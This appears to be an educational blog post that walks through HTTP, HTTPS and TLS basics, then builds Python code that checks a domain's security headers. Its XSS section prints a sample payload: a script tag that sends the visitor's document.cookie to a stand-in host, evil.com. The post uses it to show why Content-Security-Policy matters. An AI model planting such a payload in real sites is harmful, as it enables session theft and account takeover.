Building a Domain Security Analyzer — HTTP Security Headers
In the last post, we added SSL certificate validation. But before we check security headers, let's understand what actually happens when you visit a website. We'll start from the very beginning.
Today's Goal
By the end of this post, you'll understand:
What HTTP is — How browsers and servers communicate
What HTTPS is — How that communication becomes private
What security headers are — Extra instructions for safer browsing
How to check them — Code that analyzes any domain's headers
Part 1: What Really Happens When You Type github.com
When you type github.com and press Enter, the first thing your browser does is figure out where GitHub actually is. Your browser asks a DNS server "What's the IP address for github.com?" and gets back something like 20.207.73.82. We covered this in our first blog post.
Now your browser knows the address. But it can't just start sending data. First, it needs to establish a connection.
The TCP Handshake
Your computer sends a small packet to GitHub's server saying "I want to talk to you." GitHub's server responds "Okay, I'm listening." Your computer confirms "Great, let's begin." This is called the TCP handshake: three messages (named SYN, SYN-ACK, and ACK) just to establish that both sides are ready to communicate. Think of it like calling someone on the phone: it rings, they pick up, you say hello, they say hello back. Only then do you start the actual conversation.
Once this connection is established, your browser can send the actual HTTP request. (For an HTTPS site like GitHub, one more handshake happens first to set up encryption; Part 7 covers it.)
Part 2: What is a Packet?
When your computer sends data over the internet, it doesn't send it as one big chunk. It breaks the data into small pieces called packets. Each packet is just a small bundle of bytes — typically around 1500 bytes maximum.
Why packets? Imagine you want to send a large book to someone across the country. You could ship the whole book in one box. But if that box gets lost, you lose everything. Instead, imagine tearing out each page and mailing them separately. If one page gets lost, you only resend that page. Also, different pages can take different routes and still arrive at the destination.
The internet works this way. Your data gets split into packets. Each packet travels independently through the network. They might take different paths. They arrive at the destination, and the receiving computer reassembles them in the correct order.
Each packet contains two things: the actual data you're sending, and some header information that says where it came from and where it's going — like the address on an envelope.
Part 3: How Does a Packet Know Where to Go?
At the physical level, it's just signals: electrical pulses on a copper wire, or pulses of light in a fiber-optic cable. The wire doesn't know anything. It carries signals and has no idea what those signals mean.
The meaning comes from how we interpret the signals.
At the lowest level, a wire can carry two states — voltage on or voltage off. Think of it like a light switch. On or off. We call these 1 and 0.
So if I send: on, off, off, on, on, off, on, off
That's: 1 0 0 1 1 0 1 0
That's just 8 bits. One byte. The number 154 in decimal.
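To make the arithmetic concrete, here is a tiny Python sketch that maps the on/off sequence above to bits and reads them as a number. It only illustrates the counting. It is not how network hardware actually decodes signals.

```python
# The eight on/off states from the example above.
signals = ["on", "off", "off", "on", "on", "off", "on", "off"]

# Map each state to a bit: on -> 1, off -> 0.
bits = "".join("1" if s == "on" else "0" for s in signals)

# Read the bit string as a base-2 number.
value = int(bits, 2)

print(bits)   # 10011010
print(value)  # 154
```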
But what does 154 mean? By itself, nothing. It's just a number.
Layers of Meaning
We build layers of interpretation on top of these raw bits.
Suppose we agree that the first few bytes of any transmission will be the destination address, followed by the source address, followed by some information about what kind of data this is, followed by the actual data.
Now when I send a stream of bits, you can look at the first part and say "this is going to address X." You look at the next part and say "this came from address Y." You look at the next part and say "this is a certain type of data." Then you read the actual content.
This is exactly what happens. The bits traveling on the wire are organized into a structure. The structure has a known format. The first so many bytes mean this, the next so many bytes mean that.
The Structure of a Packet
When your computer sends a packet to GitHub, the packet is just a sequence of bytes — ones and zeros on the wire. But those bytes are organized in a specific order that everyone agrees on.
The packet has layers, like an envelope inside an envelope.
The outermost layer is the Ethernet frame. This contains the MAC address of your router and the MAC address of your computer. MAC addresses are physical addresses burned into network hardware. This layer is only used to get the packet from your computer to your router.
Inside that is the IP layer. This contains the source IP address and destination IP address. Your IP might be something your router assigns internally, like 192.168.1.5. The destination IP is GitHub's: 20.207.73.82.
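Inside that is the TCP layer. This contains the source port and destination port. Maybe your source port is 52431 and the destination port is 443, the standard port for HTTPS.
Inside that is the actual HTTP data: the text that says GET /repositories HTTP/1.1 and so on. (Over HTTPS this part is encrypted, as Part 7 explains. For now, picture it as plain text.)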
So the full packet on the wire looks something like:
[Ethernet header] [IP header] [TCP header] [HTTP data]
Each header has a fixed format. The IP header always has the source IP at a certain position and the destination IP at another position. Every device on the internet knows this format.
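Here's a small Python sketch of what "a fixed format" means. It assumes the standard 20-byte IPv4 header with no options. The helper names build_ipv4_header and read_addresses are made up for this example. The checksum is left at zero for simplicity, so a real network would drop this packet. The point is that the source address always sits in bytes 12 to 15 and the destination in bytes 16 to 19.

```python
import socket
import struct

# Fixed 20-byte IPv4 header layout ("!" = network byte order, big-endian):
# version/IHL, TOS, total length, ID, flags/fragment, TTL, protocol,
# checksum, source address, destination address.
IPV4_HEADER = struct.Struct("!BBHHHBBH4s4s")

def build_ipv4_header(src_ip, dst_ip, payload_len):
    """Pack a minimal IPv4 header (hypothetical helper, checksum left as 0)."""
    version_ihl = (4 << 4) | 5           # version 4, header length 5 x 32-bit words
    total_length = IPV4_HEADER.size + payload_len
    return IPV4_HEADER.pack(
        version_ihl, 0, total_length,
        0, 0,                            # identification, flags/fragment offset
        64, 6, 0,                        # TTL, protocol (6 = TCP), checksum
        socket.inet_aton(src_ip), socket.inet_aton(dst_ip),
    )

def read_addresses(packet):
    """Read the source and destination IP from their fixed positions."""
    fields = IPV4_HEADER.unpack(packet[:IPV4_HEADER.size])
    return socket.inet_ntoa(fields[8]), socket.inet_ntoa(fields[9])

header = build_ipv4_header("192.168.1.5", "20.207.73.82", payload_len=100)
print(len(header))                      # 20
print(socket.inet_ntoa(header[12:16]))  # source, always at bytes 12-15
print(read_addresses(header))
```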
How Routers Use This
When your packet arrives at your router, the router reads the Ethernet header first. It sees the packet is addressed to the router itself. Good. The router strips off the Ethernet header and looks at the IP header underneath.
The IP header says the destination is 20.207.73.82. The router doesn't know where that is exactly, but it knows which direction to send it — probably to your ISP. So the router wraps the packet in a new Ethernet header addressed to your ISP's equipment and sends it out.
Your ISP's router receives it, strips the Ethernet header, reads the IP header, sees 20.207.73.82, figures out which direction to send it next, wraps it in a new Ethernet header, and forwards it.
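This happens at every hop along the way. Each router looks at the destination IP to decide where to send the packet next. The destination IP never changes, but the Ethernet header is replaced at every hop. (There is one exception on the source side: your home router rewrites your private source address, such as 192.168.1.5, to your public IP. Part 5 explains how.)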
Eventually the packet reaches GitHub's network. Their router sees the destination IP is their own server. It delivers the packet to that server.
The server strips off the Ethernet header, the IP header, the TCP header, and finally reads the HTTP data: GET /repositories HTTP/1.1.
Part 4: But How Does Your Computer Know GitHub's IP?
You're typing github.com, not an IP address. Your computer has no idea what GitHub's IP address is. You only typed a name. Names are for humans. Computers need numbers.
So before anything else can happen, your computer must convert the name github.com into an IP address. This is what DNS does.
The DNS Query
Your computer constructs a DNS query. This is a small packet that basically says: "What is the IP address for github.com?"
Your computer sends this to a DNS resolver — maybe Google's at 8.8.8.8 or Cloudflare's at 1.1.1.1 or your ISP's DNS server.
The resolver receives your query. It looks up the answer — either from its own cache, or by querying other DNS servers. It finds that github.com maps to 20.207.73.82.
It sends a response packet back to your IP address. Your computer now knows: github.com is 20.207.73.82.
Only now can your browser make the actual HTTP request.
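The DNS query itself is just a few bytes, in a format defined by the DNS standard (RFC 1035). This Python sketch builds those bytes for github.com without sending them. build_dns_query is a hypothetical helper, and the query ID 0x1234 is an arbitrary choice. Sending the result over UDP to port 53 on a resolver would be the next step, which we skip here.

```python
import struct

def build_dns_query(name, query_id=0x1234):
    """Build the bytes of a DNS query asking for the A record of `name`."""
    # Header: ID, flags (0x0100 = "recursion desired"), 1 question,
    # 0 answers, 0 authority records, 0 additional records.
    header = struct.pack("!HHHHHH", query_id, 0x0100, 1, 0, 0, 0)

    # The name is encoded as length-prefixed labels ending in a zero byte:
    # 6 "github" 3 "com" 0.
    qname = b"".join(
        bytes([len(label)]) + label.encode("ascii") for label in name.split(".")
    ) + b"\x00"

    # QTYPE 1 = A record (IPv4 address), QCLASS 1 = Internet.
    question = qname + struct.pack("!HH", 1, 1)
    return header + question

query = build_dns_query("github.com")
print(len(query))    # 28 bytes in total
print(query[12:24])  # the encoded name
```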
Who Manages DNS Servers?
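At the very top are the root servers. There are 13 root server addresses (a.root-servers.net through m.root-servers.net), managed by various organizations: some by universities, some by government agencies, some by companies like Verisign. Each address is actually served by many machines spread around the world.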
The root servers don't know every domain. They only know who manages each top-level domain like .com, .org, .in.
Verisign manages .com. For every .com domain registered or renewed, Verisign receives a wholesale fee through the registrar: roughly 10 US dollars per domain per year as of 2024. There are over 150 million .com domains. That's how Verisign funds its servers and makes a profit.
When GitHub registered their domain, they told the registrar where their DNS servers are. When someone asks for github.com, the resolver follows a chain: the root servers point to Verisign's .com servers, which point to GitHub's DNS servers, which provide the actual IP address.
Part 5: How Does GitHub Know Which Request is Yours?
GitHub's server might be receiving thousands of requests every second from different people around the world. How does it keep track of which response goes to which person?
IP Addresses and Ports
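Your home router has a public IP address assigned by your ISP. Let's say it's 49.36.128.55. This address usually identifies your home on the internet at this moment. (Some ISPs share one public address among many customers, but the idea is the same.)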
But what if multiple devices in your house are all accessing GitHub at the same time? Your brother is on his laptop, you're on your phone, your sister is on her computer. All three are behind the same router with the same public IP. How does the router know which response goes to which device?
This is where ports come in.
When your browser opens a connection to GitHub, it picks a random port number — let's say 52431. Your brother's laptop picks a different port — maybe 48892. Your sister's computer picks another — maybe 51007.
So the full address is not just an IP, it's an IP plus a port:
Your connection: 49.36.128.55:52431 → 20.207.73.82:443
Your brother's connection: 49.36.128.55:48892 → 20.207.73.82:443
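Your router keeps a table, a technique called Network Address Translation (NAT). It remembers that port 52431 belongs to your phone, port 48892 belongs to your brother's laptop, and so on. If two devices happen to pick the same port, the router swaps in a different public port for one of them, so every entry in the table stays unique.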
When GitHub sends a response to 49.36.128.55:52431, your router looks at the port number, checks its table, and forwards the data to your phone.
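The router's table can be modeled as a simple dictionary. This is a toy Python sketch, not how any particular router is implemented. The NatTable class is hypothetical, and real routers choose replacement ports in their own ways. Here the sister's computer deliberately picks the same port as your phone, to show what happens on a collision.

```python
class NatTable:
    """A toy model of the port table a home router keeps (NAT)."""

    def __init__(self, public_ip):
        self.public_ip = public_ip
        self.entries = {}  # public port -> (device, device's own port)

    def outgoing(self, device, local_port):
        """Record a new outgoing connection; return the public address used."""
        public_port = local_port
        # If another device already uses this port, pick the next free one.
        while public_port in self.entries:
            public_port += 1
        self.entries[public_port] = (device, local_port)
        return f"{self.public_ip}:{public_port}"

    def incoming(self, public_port):
        """Look up which device a reply to this public port belongs to."""
        return self.entries.get(public_port)

router = NatTable("49.36.128.55")
print(router.outgoing("your phone", 52431))         # 49.36.128.55:52431
print(router.outgoing("brother's laptop", 48892))   # 49.36.128.55:48892
print(router.outgoing("sister's computer", 52431))  # collision -> 52432
print(router.incoming(52431))                       # ('your phone', 52431)
```

When a reply arrives for port 52432, the table sends it to the sister's computer on its original port 52431.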
How Are Packets Reassembled?
Your HTTP request might be split across multiple packets. How does GitHub put them back together in the right order?
TCP handles this. The TCP header contains a sequence number.
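When your browser sends data, TCP assigns a sequence number to every byte. (Real connections start counting from a random number chosen during the handshake, but starting at 1 keeps the example readable.) If your HTTP request is 500 bytes: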
Packet 1 contains bytes 1-200, TCP header says "sequence number 1"
Packet 2 contains bytes 201-400, TCP header says "sequence number 201"
Packet 3 contains bytes 401-500, TCP header says "sequence number 401"
Packets might arrive out of order. GitHub's server looks at the sequence numbers and reassembles them correctly.
If a packet gets lost, the sender notices it was never acknowledged and sends it again. As long as the connection stays up, this guarantees all data arrives completely and in order.
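Reassembly by sequence number boils down to sorting and checking for gaps. This Python sketch uses the three packets from the example, arriving out of order. It assumes numbering starts at 1. It ignores acknowledgments, retransmission, and overlapping segments, all of which real TCP handles. reassemble is a hypothetical helper.

```python
# Segments as (sequence number, data), arriving out of order.
arrived = [
    (201, b"B" * 200),
    (401, b"C" * 100),
    (1, b"A" * 200),
]

def reassemble(segments, first_seq=1):
    """Sort segments by sequence number and join them, checking for gaps."""
    data = b""
    expected = first_seq
    for seq, payload in sorted(segments):
        if seq != expected:
            # A gap means a packet is missing and would need retransmission.
            raise ValueError(f"missing bytes starting at {expected}")
        data += payload
        expected = seq + len(payload)
    return data

message = reassemble(arrived)
print(len(message))               # 500
print(message[:3], message[-3:])  # b'AAA' b'CCC'
```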
Part 6: What is HTTP?
Now your request has reached GitHub. The connection is established. Your browser needs to ask for a webpage. How does it ask?
HTTP — HyperText Transfer Protocol — is the language browsers and servers use to communicate. It's a set of rules for how to request things and how to respond.
What Does an HTTP Request Look Like?
When your browser asks GitHub for a page, it sends plain text:
GET /repositories HTTP/1.1
Host: github.com
User-Agent: Chrome/120.0
Accept: text/html
That's it. Just text.
The first line says what you want. GET means you want to retrieve something. /repositories is the path — which specific page you want. HTTP/1.1 is the version of HTTP.
The next lines are headers — extra information about your request. Host says which website you want. User-Agent says what browser you're using. Accept says what type of content you can handle.
This text gets converted to bytes, broken into packets, and sent across the internet to GitHub.
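Here's that request built in Python. One detail the example above leaves out: HTTP/1.1 ends each line with a carriage return plus a line feed ("\r\n"), and an empty line marks the end of the headers. This is only a sketch of the bytes. A real browser adds many more headers.

```python
# The request from the example above, one header per line.
request_lines = [
    "GET /repositories HTTP/1.1",
    "Host: github.com",
    "User-Agent: Chrome/120.0",
    "Accept: text/html",
]

# Lines end with "\r\n"; an extra "\r\n" (an empty line) ends the headers.
request_text = "\r\n".join(request_lines) + "\r\n\r\n"

# "Converted to bytes": each ASCII character becomes one byte.
request_bytes = request_text.encode("ascii")

print(len(request_bytes))
print(request_bytes)
```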
What Does an HTTP Response Look Like?
GitHub's server receives your request, finds the page, and sends back a response. Also plain text:
HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 45231

<!DOCTYPE html>
<html>
<head><title>GitHub</title></head>
<body>
...the actual webpage...
</body>
</html>
The first line is the status. 200 means success. 404 would mean not found. 500 would mean server error.
Then come response headers. Content-Type tells your browser this is HTML. Content-Length says how many bytes the body is.
Then a blank line.
Then the actual content — the HTML of the webpage.
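Because the blank line is what separates headers from body, splitting a response is straightforward. This is a simplified Python sketch, and parse_response is a hypothetical helper. It assumes the whole response is already in memory as text. Real HTTP libraries also handle binary bodies, chunked transfer, and case-insensitive header names.

```python
raw = (
    "HTTP/1.1 200 OK\r\n"
    "Content-Type: text/html\r\n"
    "Content-Length: 46\r\n"
    "\r\n"
    "<!DOCTYPE html>\n<html>...the webpage...</html>"
)

def parse_response(text):
    """Split a raw HTTP/1.1 response into status code, reason, headers, body."""
    head, _, body = text.partition("\r\n\r\n")    # the blank line separates them
    status_line, *header_lines = head.split("\r\n")
    _version, code, reason = status_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip()] = value.strip()
    return int(code), reason, headers, body

code, reason, headers, body = parse_response(raw)
print(code, reason)              # 200 OK
print(headers["Content-Type"])   # text/html
print(len(body))                 # matches Content-Length: 46
```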
The Problem With HTTP
HTTP sends everything in plain text. Your request travels through your router, your ISP, multiple other networks, before reaching GitHub. At any point along this path, someone could read the text.
If you're logging into GitHub:
POST /login HTTP/1.1
Host: github.com

username=umang&password=secret123
Your username and password are right there in plain text. Anyone who can see the packets can read your password.
Part 7: What is HTTPS?
HTTPS is HTTP with encryption. The S stands for Secure.
With HTTPS, before any HTTP request is sent, your browser and GitHub's server set up encryption. They do a handshake where they agree on a secret key that only they know.
Once encryption is set up, your browser takes the same HTTP request but encrypts it before sending. What actually travels on the wire looks like:
xK7$mP2#vL9@nQ4%bR8&hY3*kW6!tF5^jM1...
Complete garbage to anyone watching.
GitHub's server receives this, decrypts it using the secret key, and sees your original request with your username and password.
The Handshake — How Encryption Gets Set Up
Your browser sends a "hello" packet to GitHub saying "I want a secure connection. Here are the encryption methods I support."
GitHub responds with "Let's use this encryption method. Here's my certificate." The certificate contains GitHub's public key and proof that GitHub is really GitHub.
Your browser verifies the certificate. It checks: Is this signed by a trusted authority? Is it for github.com? Has it expired?
Now comes the clever part. Your browser generates a random secret. It encrypts this secret using GitHub's public key and sends it.
Anyone watching can see this packet. But it's encrypted with GitHub's public key. Only GitHub's private key can decrypt it. The private key never travels on the wire — it stays on GitHub's server.
GitHub decrypts the secret using their private key. Now both sides know the same secret, but no one else does.
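They use this secret to generate encryption keys. From now on, all data is encrypted.
This is the classic RSA key exchange from older versions of TLS, the protocol behind HTTPS. Modern TLS 1.3 uses a Diffie-Hellman exchange instead. Both sides contribute random values, and each computes the same secret without it ever crossing the wire. GitHub uses its private key to sign the exchange, which proves its identity. The outcome is the same: a shared secret nobody else knows.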
Why Can't Someone Just Decrypt With the Public Key?
This is a common question. If the browser encrypts with the public key, why can't an eavesdropper decrypt with the same public key?
Because public key cryptography doesn't work that way. The public key can only encrypt. It cannot decrypt — not even data it encrypted itself. Only the private key can decrypt.
In RSA, one widely used public key system, this rests on math that's easy in one direction but impractical to reverse. The public key contains a huge number N that's the product of two secret prime numbers P and Q. Encryption needs only N. Decryption needs a private number that can only be computed from P and Q. With the best known methods, figuring out P and Q from N alone would take longer than the age of the universe for large enough numbers.
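The math can be tried with tiny numbers. This Python sketch is textbook RSA with the primes 61 and 53. These primes are far too small to be secure, and real systems also add padding, which this omits. It needs Python 3.8 or newer for pow(e, -1, phi), which computes the private exponent.

```python
# Toy RSA with tiny primes (real keys use primes hundreds of digits long).
P, Q = 61, 53
N = P * Q                  # 3233, published as part of the public key
phi = (P - 1) * (Q - 1)    # 3120, computable only if you know P and Q
e = 17                     # public exponent, also published
d = pow(e, -1, phi)        # private exponent, derived from P and Q

message = 65
ciphertext = pow(message, e, N)    # anyone can do this with (N, e)
recovered = pow(ciphertext, d, N)  # only the holder of d can do this

print(N, d)        # 3233 2753
print(ciphertext)  # 2790
print(recovered)   # 65
```

Knowing N = 3233 and e = 17 lets anyone encrypt. Computing d requires phi, and computing phi requires factoring N back into 61 and 53. That step is trivial here and infeasible for real key sizes.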
Symmetric Encryption
There's one more detail. Public key encryption is slow. So it's only used to share a small secret. Once both sides have the secret, they switch to symmetric encryption — where the same key encrypts and decrypts.
Symmetric encryption is fast. The actual HTTP data (your requests, the webpages) is encrypted using this fast method, typically with an algorithm such as AES or ChaCha20. The slow public key method was only used once, to safely share the symmetric key.
Could Someone Guess the Symmetric Key?
Yes, if you guess the key, you can decrypt everything. But guessing is practically impossible.
A 128-bit key has 340,282,366,920,938,463,463,374,607,431,768,211,456 possible values. If you tried one trillion guesses per second, it would take longer than the age of the universe to try them all.
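A quick Python check of the numbers above. It assumes one trillion guesses per second and an age of the universe of about 13.8 billion years.

```python
keys = 2 ** 128                       # every possible 128-bit key
guesses_per_second = 10 ** 12         # one trillion
seconds_per_year = 365.25 * 24 * 60 * 60
age_of_universe_years = 13.8e9        # approximate

years_needed = keys / guesses_per_second / seconds_per_year

print(f"{keys:,}")
print(f"{years_needed:.2e} years to try every key")
print(f"{years_needed / age_of_universe_years:.1e} times the age of the universe")
```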
The secrecy of an HTTPS connection rests on this key being impractical to guess and never being transmitted in plain form.
Part 8: What Are HTTP Headers?
Your request reached GitHub encrypted. GitHub decrypted it, processed it, and sent back a response — also encrypted. Your browser decrypted the response.
Now your browser has the raw HTTP response:
HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 45231
Strict-Transport-Security: max-age=31536000
X-Frame-Options: DENY

<!DOCTYPE html>
<html>...the webpage...</html>
The body is the actual webpage. But before the body, there are headers. These headers are instructions from GitHub's server to your browser.
Some headers are informational — Content-Type says this is HTML. But some headers are security instructions. They tell your browser how to behave safely when handling this website.
When Does the Browser Receive Headers?
Every time. Every HTTP response has headers. When you visit GitHub's homepage, you get headers. When you load an image, you get headers. Every single response.
Different headers are applied at different times. Some are remembered by your browser for future visits, like Strict-Transport-Security. Others, like X-Frame-Options, apply only to the response they arrive with.
Part 9: Why Are Security Headers Needed?
HTTPS protects data while it travels. But once the data arrives at your browser, new threats exist. These threats happen inside your browser, after decryption. HTTPS cannot help with these.
Attack 1: Clickjacking
An iframe is a way to embed one webpage inside another. You've seen this — a news article with a YouTube video embedded in it.
Now imagine an attacker creates a website. On their page, they create an iframe that loads GitHub's account deletion page. But they make this iframe invisible — opacity zero, or positioned so you can't see it.
On top of this invisible iframe, they put a big button saying "Click here to win a free iPhone."
They position it so that GitHub's "Confirm Delete" button sits exactly where the "win prize" button appears to be.
You click what you think is "win prize." But your click actually lands on the invisible GitHub "Confirm Delete" button. If you're logged into GitHub, your account gets deleted. You never saw GitHub's page. Your click was hijacked.
How X-Frame-Options Prevents This
GitHub sends this header:
X-Frame-Options: DENY
This tells your browser: "Do not allow GitHub pages to be displayed inside iframes on other websites."
When the attacker's site tries to load GitHub in an iframe, your browser checks GitHub's headers, sees X-Frame-Options: DENY, and refuses to display it. The iframe stays empty. Attack prevented.
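Roughly, the browser's decision looks like this Python sketch. The function may_frame is hypothetical and simplified. It ignores the newer Content-Security-Policy frame-ancestors directive, which modern browsers also honor. It also covers the other common value, SAMEORIGIN, which allows framing only by pages from the same origin.

```python
def may_frame(x_frame_options, page_origin, embedding_origin):
    """Decide whether a page may be shown inside an iframe (simplified)."""
    if x_frame_options is None:
        return True                      # no header: framing is allowed
    value = x_frame_options.strip().upper()
    if value == "DENY":
        return False                     # never allow framing
    if value == "SAMEORIGIN":
        return page_origin == embedding_origin
    return True                          # unrecognized values are ignored

print(may_frame("DENY", "https://github.com", "https://evil.example"))        # False
print(may_frame("SAMEORIGIN", "https://github.com", "https://github.com"))    # True
print(may_frame(None, "https://example.com", "https://evil.example"))         # True
```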
Attack 2: XSS (Cross-Site Scripting)
Many websites let users post content — comments, profiles, reviews.
Suppose an attacker writes this as their bio:
Hi, I'm a developer! <script>fetch('https://evil.com/steal?cookie=' + document.cookie)</script>
If the website saves this and displays it without sanitizing, what happens?
When someone visits that profile, their browser sees a script tag and executes it, just like any other script on the page. The script reads the visitor's cookies and sends them to the attacker. With the visitor's session cookie, the attacker can log into their account.
How Content-Security-Policy Helps
GitHub sends this header:
Content-Security-Policy: script-src 'self'
This tells the browser: "Only execute JavaScript files loaded from my own origin (same scheme, domain, and port). Do not execute inline scripts."
When the browser sees the malicious script tag, it checks the policy. Inline scripts aren't allowed. The browser refuses to execute it. Attack prevented.
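To see how a checker might tell whether a policy blocks inline scripts, here is a rough Python sketch. parse_csp and inline_scripts_allowed are hypothetical helpers. The sketch applies the rule that script-src falls back to default-src when it is missing. It ignores nonces, hashes, and other CSP features that can change the outcome, so treat it as an approximation.

```python
def parse_csp(header):
    """Turn a CSP header into {directive: [sources]}."""
    policy = {}
    for part in header.split(";"):
        tokens = part.split()
        if tokens:
            # Only the first occurrence of a directive counts.
            policy.setdefault(tokens[0].lower(), tokens[1:])
    return policy

def inline_scripts_allowed(header):
    """Rough check: would this policy let an inline <script> run?"""
    policy = parse_csp(header)
    # script-src falls back to default-src when it is missing.
    sources = policy.get("script-src", policy.get("default-src"))
    if sources is None:
        return True                      # no script restriction at all
    return "'unsafe-inline'" in sources

print(inline_scripts_allowed("script-src 'self'"))                    # False
print(inline_scripts_allowed("default-src 'self' 'unsafe-inline'"))   # True
print(inline_scripts_allowed("img-src *"))                            # True
```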
Attack 3: Protocol Downgrade
You type github.com without the https://. Your browser might try http:// first. An attacker on your network could intercept this unencrypted request and serve you a fake page.
How Strict-Transport-Security Helps
The first time you visit GitHub over HTTPS, GitHub sends:
Strict-Transport-Security: max-age=31536000
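Your browser remembers: "For the next year, always use HTTPS for GitHub." (31,536,000 seconds is 365 days.)
From now on, whenever you type github.com, your browser automatically uses HTTPS. It never tries HTTP, so the attacker never gets a chance. The one remaining gap is the very first visit, before the browser has seen the header. That's why sites like GitHub also add preload to the header and get listed in the HSTS preload list built into browsers.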
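When an analyzer reads this header, it helps to split it into its parts. This Python sketch assumes a well-formed header, and parse_hsts is a hypothetical helper. Note that preload is not part of the HSTS standard itself. It is a convention used by the browsers' preload list.

```python
def parse_hsts(header):
    """Parse a Strict-Transport-Security value into its parts."""
    result = {"max_age": None, "include_subdomains": False, "preload": False}
    for directive in header.split(";"):
        name, _, value = directive.strip().partition("=")
        name = name.strip().lower()          # directive names are case-insensitive
        if name == "max-age":
            result["max_age"] = int(value.strip().strip('"'))
        elif name == "includesubdomains":
            result["include_subdomains"] = True
        elif name == "preload":
            result["preload"] = True
    return result

hsts = parse_hsts("max-age=31536000; includeSubDomains; preload")
print(hsts)
print(hsts["max_age"] / (24 * 60 * 60), "days")   # 365.0 days
```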
Part 10: The Security Headers We'll Check
Here are the headers we'll look for:
Strict-Transport-Security — Forces HTTPS connections. Prevents downgrade attacks.
Content-Security-Policy — Controls what scripts, styles, and content can load. Prevents XSS.
X-Frame-Options — Prevents the site from being embedded in iframes. Prevents clickjacking.
X-Content-Type-Options — Prevents browsers from guessing content types. Stops certain attacks where browsers might execute files as scripts.
Referrer-Policy — Controls what URL information is sent when you click links to other sites. Prevents leaking sensitive URL paths.
Permissions-Policy — Controls access to browser features like camera, microphone, location.
Part 11: The Code
Let's write code that checks for these headers.
First, install the requests library:
pip install requests
pip freeze > requirements.txt
Add this import at the top of analyzer.py:
import requests
Now add this function:
def get_security_headers(domain):
    """Fetch and analyze HTTP security headers for a domain."""
    # Our checklist: the headers we want to find in the response.
    security_headers = {
        'Strict-Transport-Security': {
            'description': 'Forces HTTPS connections',
            'recommended': True
        },
        'Content-Security-Policy': {
            'description': 'Controls allowed content sources',
            'recommended': True
        },
        'X-Frame-Options': {
            'description': 'Prevents clickjacking attacks',
            'recommended': True
        },
        'X-Content-Type-Options': {
            'description': 'Prevents MIME type sniffing',
            'recommended': True
        },
        'Referrer-Policy': {
            'description': 'Controls referrer information leakage',
            'recommended': True
        },
        'Permissions-Policy': {
            'description': 'Controls browser feature access',
            'recommended': True
        }
    }
    try:
        url = f"https://{domain}"
        # DNS lookup, TCP handshake, TLS handshake, request and response all happen here.
        response = requests.get(url, timeout=10, allow_redirects=True)
        results = {
            'success': True,
            'url': response.url,
            'status_code': response.status_code,
            'headers': {}
        }
        # Compare each header on the checklist against what the server sent.
        for header_name, header_info in security_headers.items():
            header_value = response.headers.get(header_name)
            results['headers'][header_name] = {
                'present': header_value is not None,
                'value': header_value,
                'description': header_info['description']
            }
        return results
    # Order matters: Python uses the first matching clause, and in requests
    # both SSLError and ConnectTimeout are subclasses of ConnectionError.
    except requests.exceptions.SSLError as e:
        return {
            'success': False,
            'error': f"SSL Error: {e}"
        }
    except requests.exceptions.Timeout:
        return {
            'success': False,
            'error': "Connection timed out"
        }
    except requests.exceptions.ConnectionError:
        return {
            'success': False,
            'error': f"Could not connect to {domain}"
        }
    except Exception as e:
        return {
            'success': False,
            'error': str(e)
        }
Part 12: Code Walkthrough
Let me explain each part.
def get_security_headers(domain):
This defines a function that takes a domain name like "github.com" and returns information about its security headers.
security_headers = {
    'Strict-Transport-Security': {
        'description': 'Forces HTTPS connections',
        'recommended': True
    },
    ...
}
This is our checklist — the headers we want to check. We define what we're looking for. The server's response might have some of these, all of these, or none.
url = f"https://{domain}"
response = requests.get(url, timeout=10, allow_redirects=True)
We build the URL and make the request.
requests.get() does everything we discussed — DNS lookup, TCP handshake, TLS handshake, sending the HTTP request, receiving the response. The library handles all of it.
timeout=10 means give up after 10 seconds if no response.
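allow_redirects=True means follow redirects automatically. This is already the default for requests.get(), so writing it out just makes the behavior explicit. After any redirects, response.url holds the final address.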
The response object contains everything the server sent back — status code, headers, body.
results = {
    'success': True,
    'url': response.url,
    'status_code': response.status_code,
    'headers': {}
}
We create a dictionary to store our findings. The headers dictionary starts empty — we'll fill it as we check each header.
for header_name, header_info in security_headers.items():
    header_value = response.headers.get(header_name)
This loops through our checklist. For each header we care about, we ask the response: "Do you have this header?"
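response.headers.get(header_name) returns the header's value if it exists, or None if it doesn't. The lookup is case-insensitive, because requests stores headers in a CaseInsensitiveDict. A server that sends x-frame-options in lowercase still matches X-Frame-Options.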
results['headers'][header_name] = {
    'present': header_value is not None,
    'value': header_value,
    'description': header_info['description']
}
We record what we found. If header_value is None, present becomes False. If it has a value, present becomes True.
This is how we detect missing headers. We check each header on our list against what the server actually sent. If it's not in the response, it's missing.
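Because the comparison logic doesn't depend on the network, one option is to pull it into a pure function that can be tested with a plain dictionary. This Python sketch shows an alternative structure and is not part of the analyzer code above. check_headers is a hypothetical name. It lowercases names itself, because a plain dict, unlike requests' header object, is case-sensitive.

```python
SECURITY_HEADERS = [
    "Strict-Transport-Security",
    "Content-Security-Policy",
    "X-Frame-Options",
    "X-Content-Type-Options",
    "Referrer-Policy",
    "Permissions-Policy",
]

def check_headers(response_headers):
    """Report which security headers are present, ignoring name case."""
    # HTTP header names are case-insensitive, so compare lowercased names.
    lowered = {name.lower(): value for name, value in response_headers.items()}
    report = {}
    for name in SECURITY_HEADERS:
        value = lowered.get(name.lower())
        report[name] = {"present": value is not None, "value": value}
    return report

sample = {"strict-transport-security": "max-age=31536000", "X-Frame-Options": "deny"}
report = check_headers(sample)
missing = [name for name, info in report.items() if not info["present"]]
print(missing)
```

Feeding it a hand-written dictionary like sample makes it easy to check the present/missing logic without making a single request.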
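except requests.exceptions.SSLError as e:
    return {
        'success': False,
        'error': f"SSL Error: {e}"
    }
If something goes wrong (an SSL error, a refused connection, a timeout), we catch it and return an error message instead of crashing. The order of the except clauses matters, because Python uses the first one that matches. In requests, SSLError is a subclass of ConnectionError, and so is ConnectTimeout (which is also a Timeout). The more specific exceptions therefore have to come before ConnectionError.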
Part 13: Update main() to Display Results
Add this to your main() function after the SSL section:
# Security Headers
print("\nSecurity Headers:")
headers_result = get_security_headers(domain)
if headers_result['success']:
    print(f" URL: {headers_result['url']}")
    print(f" Status: {headers_result['status_code']}")
    print()
    for header_name, header_data in headers_result['headers'].items():
        if header_data['present']:
            value = header_data['value']
            if len(value) > 50:
                value = value[:50] + "..."
            print(f" ✓ {header_name}")
            print(f" {value}")
        else:
            print(f" ✗ {header_name} - MISSING")
            print(f" ({header_data['description']})")
else:
    print(f" ✗ Error: {headers_result['error']}")
Part 14: Explanation of Display Code
headers_result = get_security_headers(domain)
Call our function and store the results.
if headers_result['success']:
Only show details if the request worked.
